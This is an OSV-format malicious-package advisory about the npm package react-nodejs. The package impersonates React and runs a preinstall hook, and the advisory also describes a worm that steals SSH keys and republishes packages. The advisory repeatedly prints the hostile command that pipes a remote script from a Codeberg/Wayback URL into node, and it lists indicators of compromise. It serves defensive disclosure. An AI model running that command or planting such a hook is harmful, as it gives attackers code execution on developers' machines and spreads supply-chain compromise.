mal-2026-17294
Vulnerability from ossf_malicious_packages
Published
2026-09-29 07:12
Modified
2026-10-01 08:00
Summary
Malicious code in react-nodejs (npm)
Details

The package react-nodejs impersonates the legitimate 'react' package (it republishes react's package metadata and code) and adds a malicious preinstall hook that runs automatically on npm install, before any dependency is installed: curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node. The hook downloads a remote JavaScript second stage from a Wayback Machine mirror of a Codeberg repository (hellscripter/install-scripts) and pipes it directly into node, giving the attacker arbitrary code execution on the installing machine. Version 19.3.0 was published on 2026-09-29. It is one of nine packages published within about 33 minutes by the npm account 'dirtyblanket' (maintainer email s7dwzxru4z@ooynib.com), all carrying the identical preinstall hook: xeprews, express-javascript, express-nodejs, react-nodejs, exprdd, exprrdd, exptrdd, exptred, exptredd.

On Linux, node.js pipes linux.sh from the same Codeberg repository into bash. linux.sh (SHA-256 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577) is a worm. It installs a Go binary, systemd-fontd, as a systemd service named "Font Rendering Service" that proxies through Tor. SafeDep has not yet analyzed that binary. The script collects SSH private keys and known_hosts files, then connects to the known hosts over SSH and runs linux.sh on them. With the same keys, it pushes a linux.sh loader into the .install file of Arch User Repository (AUR) packages that the key owner maintains. For each package.json on disk, it adds the same preinstall script, runs npm version patch, and runs npm publish with each .npmrc it finds.


-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5777ca86863da9fabb9da8e1a0d6c2f30f05533265624b2da07a8d0804930481)

package.json declares a preinstall lifecycle hook that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching a JavaScript file from an unrelated third-party Codeberg user's repository on a mutable branch (proxied through web.archive.org) and executing it in Node on the installer's machine at npm install time. The fetched content is unpinned, unverified, and controlled by an account with no relationship to the React publisher. The package additionally impersonates React: name react-nodejs, description copied from React, homepage set to https://react.dev/, and repository pointing at github.com/react/react.git, while being published by an unrelated author — a typosquat lure amplifying the install-time remote code execution.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "package.json",
              "sha256": "4ce8de223918656f7d92d0d51f7ecb32334d848189225e96e871d43e452fa3c7",
              "tlsh": "43210919cda48cb31ad56b9a6c3a1186a31d545f0c493e4cb78a842e5f4d0df50fb21c"
            }
          ],
          "package_integrity": [
            {
              "filename": "react-nodejs-19.3.0.tgz",
              "hashes": {
                "sha1": "030d07792f9dc3f792a2112fc1ab24d2b43a7a29",
                "sha512_sri": "sha512-ATi8XqGT+kcozEl79pCL+ZH5bTfr2+6OeEzB3k/KScvbn9ZGduLcuP819loUvnheFux8uocdLx0Uvox69Ijcpw=="
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "react-nodejs"
      },
      "versions": [
        "19.3.0"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "name": "Pranesh, InvisiRisk",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://safedep.io"
      ],
      "name": "SafeDep",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "iocs": {
      "files": [
        {
          "note": "preinstall script pipes the web.archive.org copy of node.js into node.",
          "paths": [
            "package.json"
          ],
          "source": "PACKAGE_ARCHIVE"
        },
        {
          "digests": {
            "sha256": "65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577"
          },
          "note": "Stage two Bash worm, piped from curl into bash.",
          "paths": [
            "linux.sh"
          ],
          "source": "IN_MEMORY"
        },
        {
          "digests": {
            "sha256": "2c9dbc14809f1e1aebda114194368b002acf74c8760b88fc101f625d179793c2"
          },
          "note": "systemd-fontd, a stripped Go ELF x86-64 binary run as the \"Font Rendering Service\" systemd service. First path as root, second path without root.",
          "paths": [
            "/usr/lib/systemd/systemd-fontrenderd",
            "~/.config/systemd/systemd-fontcached"
          ],
          "source": "DROPPED"
        }
      ],
      "urls": [
        "https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js",
        "https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js",
        "https://codeberg.org/hellscripter/install-scripts/raw/branch/main/linux.sh",
        "https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/systemd-fontd"
      ]
    },
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-020688",
        "import_time": "2026-09-29T22:41:05.688026468Z",
        "modified_time": "2026-09-29T22:18:52Z",
        "sha256": "5777ca86863da9fabb9da8e1a0d6c2f30f05533265624b2da07a8d0804930481",
        "source": "amazon-inspector",
        "versions": [
          "19.3.0"
        ]
      }
    ]
  },
  "details": "The package react-nodejs impersonates the legitimate \u0027react\u0027 package (it republishes react\u0027s package metadata and code) and adds a malicious preinstall hook that runs automatically on npm install, before any dependency is installed: `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`. The hook downloads a remote JavaScript second stage from a Wayback Machine mirror of a Codeberg repository (hellscripter/install-scripts) and pipes it directly into node, giving the attacker arbitrary code execution on the installing machine. Version 19.3.0 was published on 2026-09-29. It is one of nine packages published within about 33 minutes by the npm account \u0027dirtyblanket\u0027 (maintainer email s7dwzxru4z@ooynib.com), all carrying the identical preinstall hook: xeprews, express-javascript, express-nodejs, react-nodejs, exprdd, exprrdd, exptrdd, exptred, exptredd.\n\nOn Linux, node.js pipes linux.sh from the same Codeberg repository into bash. linux.sh (SHA-256 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577) is a worm. It installs a Go binary, systemd-fontd, as a systemd service named \"Font Rendering Service\" that proxies through Tor. SafeDep has not yet analyzed that binary. The script collects SSH private keys and known_hosts files, then connects to the known hosts over SSH and runs linux.sh on them. With the same keys, it pushes a linux.sh loader into the .install file of Arch User Repository (AUR) packages that the key owner maintains. For each package.json on disk, it adds the same preinstall script, runs npm version patch, and runs npm publish with each .npmrc it finds.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5777ca86863da9fabb9da8e1a0d6c2f30f05533265624b2da07a8d0804930481)\npackage.json declares a preinstall lifecycle hook that runs `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`, fetching a JavaScript file from an unrelated third-party Codeberg user\u0027s repository on a mutable branch (proxied through web.archive.org) and executing it in Node on the installer\u0027s machine at `npm install` time. The fetched content is unpinned, unverified, and controlled by an account with no relationship to the React publisher. The package additionally impersonates React: name `react-nodejs`, description copied from React, `homepage` set to https://react.dev/, and `repository` pointing at github.com/react/react.git, while being published by an unrelated author \u2014 a typosquat lure amplifying the install-time remote code execution.\n",
  "id": "MAL-2026-17294",
  "modified": "2026-10-01T08:00:00Z",
  "published": "2026-09-29T07:12:49Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/react-nodejs/v/19.3.0"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/react-nodejs"
    },
    {
      "type": "REPORT",
      "url": "https://safedep.io/dirtyblanket-express-impersonation-npm/"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in react-nodejs (npm)"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Loading…

Loading…

Related by attack behaviour

Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.


Loading…